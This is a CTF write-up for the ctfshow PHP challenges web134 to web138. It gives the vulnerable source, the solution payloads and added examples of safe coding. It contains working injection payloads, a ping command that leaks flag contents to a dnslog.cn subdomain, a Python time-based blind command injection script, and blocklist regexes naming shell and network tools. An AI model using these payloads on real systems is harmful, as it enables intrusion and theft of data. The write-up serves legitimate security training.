web134
<?php
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;
if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) {
    die("nonononono");
}
@parse_str($_SERVER['QUERY_STRING']);
extract($_POST);
if($key1 == '36d' && $key2 == '36d') {
    die(file_get_contents('flag.php'));
}
Officially, regarding
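The dangerous pattern in this source is the combination of a one-argument parse_str() on the raw query string and extract() on $_POST: both register request data as local variables, so the locals initialised to 0 above can be replaced by whatever the client sends. The following PHP is an added illustration, not the challenge's code or the official solution; the function names and the sample input are constructed for the demo. It contrasts that pattern with the forms of extract() and parse_str() that keep request data out of the local scope.

```php
<?php
// Added example (not the challenge's code): how extract() and the
// one-argument parse_str() let request data overwrite locals, and the
// forms that do not. Function names and sample input are constructed.

// Mirrors the challenge: locals start at 0, then extract() is called on
// request data. Any key named key1/key2 replaces the local value.
function unsafe_extract(array $post): array {
    $key1 = 0;
    $key2 = 0;
    extract($post);
    return [$key1, $key2];
}

// EXTR_SKIP refuses to overwrite a variable that already exists, so
// request data can only add new names, never replace $key1/$key2.
function safe_extract(array $post): array {
    $key1 = 0;
    $key2 = 0;
    extract($post, EXTR_SKIP);
    return [$key1, $key2];
}

// parse_str() with a result array parses the query string into $params
// and registers nothing in the calling scope. The one-argument form used
// by the challenge was deprecated in PHP 7.2 and removed in PHP 8.0.
function parse_query(string $query): array {
    $params = [];
    parse_str($query, $params);
    return $params;
}

// Constructed sample input: a POST body that tries to set both keys.
$post = ['key1' => '36d', 'key2' => '36d'];
var_dump(unsafe_extract($post));   // ["36d", "36d"]: locals overwritten
var_dump(safe_extract($post));     // [0, 0]: locals kept

// Constructed query string: the values land in an array, not in $key1.
$key1 = 0;
$params = parse_query('key1=36d&other=1');
var_dump($params['key1'], $key1);  // "36d" and 0
```

Run it with the PHP CLI (php example.php). The point of the two safe forms is that the code, not the request, decides which variable names exist; a blocklist of forbidden parameter names, as in the isset() check above, can only ever cover the names its author thought of.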
web135
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-16 18:48:03
*/
error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
    if(!preg_match('/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i', $F)){
        eval(substr($F,0,6));
    }else{
        die("师傅们居然破解了前面的,那就来一个加强版吧");
    }
}
Method one
Copy flag.php to 1.txt:
/?F=`$F`; cp flag.php 1.txt
Then visit 1.txt.
Method two
Under the 6-character limit,
we can pass in ?F=`$F`;+ping `nl flag.php|awk 'NR==15'|tr -cd "[a-z]"/"[0-9]"/"{"/"-"/"}"`.yz3qdx.dnslog.cn
and read the result back on the http://dnslog.cn/ site.
web136
<?php
error_reporting(0);
function check($x){
    if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){
        die('too young too simple sometimes naive!');
    }
}
if(isset($_GET['c'])){
    $c=$_GET['c'];
    check($c);
    exec($c);
}
else{
    highlight_file(__FILE__);
}
?>
exec: this program must have its output redirected to a file or another output stream, otherwise PHP hangs until the program finishes.
That is, nothing is echoed back; getting to see the result of execution is the key point of this challenge.
We can redirect the output to a file using tee.
For example: ls | tee 1.txt redirects the output to 1.txt.
Method one
?c=ls | tee 1
?c=cat /f149_15_h3r3 | tee 2
Method two
Use xargs with sed to batch-edit the original file, replacing die with echo and exec with system.
Answer
?c=ls | xargs sed -i 's/exec/system/'
?c=ls | xargs sed -i 's/die/echo/'
After that, do as you like.
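Two things in the explanation above deserve a concrete look: exec() really does return nothing to the page on its own, but its output can be collected through its by-reference parameters rather than by piping into a file that then sits in the web root; and the check() regex above is a blocklist of names, which is why the pipe, tee and the sleep used in method three all pass it unchanged. The PHP below is an added example, not the challenge's code or the official solution. BLOCKLIST is copied verbatim from the challenge source above (including its "pingtouch" token); the function names, the allow-list dispatcher and the sample commands are constructed for the demo.

```php
<?php
// Added example, not part of the challenge. It shows why exec() seems to
// print nothing and how its output is captured without writing a file,
// and why the challenge's blocklist passes the very tokens the write-up
// uses. BLOCKLIST is copied from the challenge; the rest is constructed.

const BLOCKLIST = '/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i';

function blocked(string $c): bool {
    return preg_match(BLOCKLIST, $c) === 1;
}

// exec() echoes nothing and returns only the last output line. The full
// output and the exit status come back through the by-reference
// parameters, so no "| tee file" redirection is needed to see them.
function run_capture(string $cmd): array {
    $lines = [];
    $status = 0;
    exec($cmd . ' 2>&1', $lines, $status);
    return ['lines' => $lines, 'status' => $status];
}

// Allow-list dispatcher: the request picks a name, the code supplies the
// command. Nothing typed by the user reaches the shell, which is the
// property a blocklist of command names cannot provide.
function run_allowed(string $action): array {
    $actions = [
        'list' => 'ls -1',
        'date' => 'date +%F',
    ];
    if (!isset($actions[$action])) {
        return ['lines' => [], 'status' => -1];
    }
    return run_capture($actions[$action]);
}

// The commands from method one and method three contain no listed token;
// only the last sample is caught, by both the '.' and the 'php' pattern.
foreach (['ls | tee 1', 'cat /f149_15_h3r3 | tee 2', 'sleep 5', 'cat flag.php'] as $c) {
    printf("%-28s %s\n", $c, blocked($c) ? 'blocked' : 'allowed');
}
// allowed / allowed / allowed / blocked

print_r(run_capture('echo one; echo two'));   // lines => [one, two], status => 0
print_r(run_allowed('ls | tee 1'));           // lines => [], status => -1
```

Run it with the PHP CLI. The dispatcher is deliberately boring: once the program and its arguments are fixed in code, the question of which shell metacharacters or command names to forbid no longer arises, and a file such as 1.txt never has to be written where the web server can serve it.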
Method three
Principle:
[root@localhost ~]# if [ `ls / -1 | cut -c 1 |awk "NR==1"` == "b" ]; then sleep 3; fi
(after 3 seconds...)
[root@localhost ~]#
Inject using this principle.
Script:
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests
import time as t
from urllib.parse import quote as urlen

# Challenge endpoint; the command is appended to the c parameter.
url = 'http://85abd7bc-8396-47d1-81d7-a10e92331e33.challenge.ctf.show/?c='
alphabet = ['{','}', '.','/','@','-','_','=','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
result = ''
# Position i of the first line of the file is compared against each
# candidate character; a match makes the server sleep, which is
# observed as a long round-trip time.
for i in range(1,100):
    for char in alphabet:
        # payload = "if [ ` ls / | awk 'NR==4' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char) #flag.php
        payload = "if [ `cat /f149_15_h3r3 | awk 'NR==1' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)
        # data = {'cmd':payload}
        try:
            start = int(t.time())
            r = requests.get(url+payload)
            # r = requests.post(url, data=data)
            end = int(t.time()) - start
            # print(i,char)
            if end >= 3:
                # A delay means this character matched; record it and
                # move on to the next position.
                result += char
                print("Flag: "+result)
                break
        except Exception as e:
            print(e)
web137 138
<?php
error_reporting(0);
highlight_file(__FILE__);
class ctfshow
{
    function __wakeup(){
        die("private class");
    }
    static function getFlag(){
        echo file_get_contents("flag.php");
    }
}
if(strripos($_POST['ctfshow'], ":")>-1){
    die("private function");
}
call_user_func($_POST['ctfshow']);
/*<?php
$rest = strripos("aaaeefwea","fw");
echo $rest;
5*/
If a ':' is passed in via POST, die() ends the script, so ':' cannot be used; the main point of this challenge is that an array can also be used to call a class method.
After the challenge was modified, the array actually passed in is shown below; viewing the source then gives the flag.
<?php
class Foo {
    function __wakeup(){
        die("private class");
    }
    static public function test() {
        print "Hello world!\n";
    }
}
call_user_func('Foo::test'); // As of PHP 5.3.0
call_user_func(array('Foo', 'test')); // As of PHP 5.3.0
?>
Hello world!
Hello world!
If you write ctfshow=array('ctfshow','getFlag') directly,
you get this:
string(26) "array('ctfshow','getFlag')"
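The reason the array form gets past the check is that strripos() is a string function: the challenge never verifies that $_POST['ctfshow'] is a string before searching it for ':'. The PHP below is an added example, not the challenge's code or the official solution; the function names and the sample inputs are constructed. It isolates the challenge's check as a function, shows how it behaves on array input, and puts a dispatcher next to it that rejects non-strings and never passes user input to call_user_func() at all.

```php
<?php
// Added example, not the challenge's code: why the ':' check in the
// challenge does not apply to array input, and a dispatcher that does
// not hand user input to call_user_func() at all. Function names and
// sample inputs are constructed.

// The challenge's check, as a function. strripos() expects a string:
// under PHP 7 an array argument yields a warning and NULL, and
// NULL > -1 is false, so the "private function" branch never runs.
// Under PHP 8 the same call throws a TypeError instead.
function legacy_allows($input): bool {
    return !(@strripos($input, ":") > -1);
}

// Hardened dispatch: non-strings are rejected up front, and the only
// callables that can run are the closures in this fixed map.
function dispatch($input): string {
    $actions = [
        'hello' => function () { return "Hello world!"; },
    ];
    if (!is_string($input) || !isset($actions[$input])) {
        return 'rejected';
    }
    return $actions[$input]();
}

var_dump(legacy_allows('ctfshow::getFlag'));          // false: the ':' is caught
if (PHP_MAJOR_VERSION < 8) {
    var_dump(legacy_allows(['ctfshow', 'getFlag']));  // true: the check is skipped
}
var_dump(dispatch('hello'));                          // "Hello world!"
var_dump(dispatch(['ctfshow', 'getFlag']));           // "rejected"
```

Run it with the PHP CLI; the PHP 7 branch is guarded because PHP 8 raises a TypeError for the array call instead of silently returning NULL. The lesson carries beyond this challenge: PHP request parameters can arrive as arrays whenever the client uses the name[] syntax, so any check written for strings has to start with is_string(), and user input should select an action from a map rather than name a callable directly.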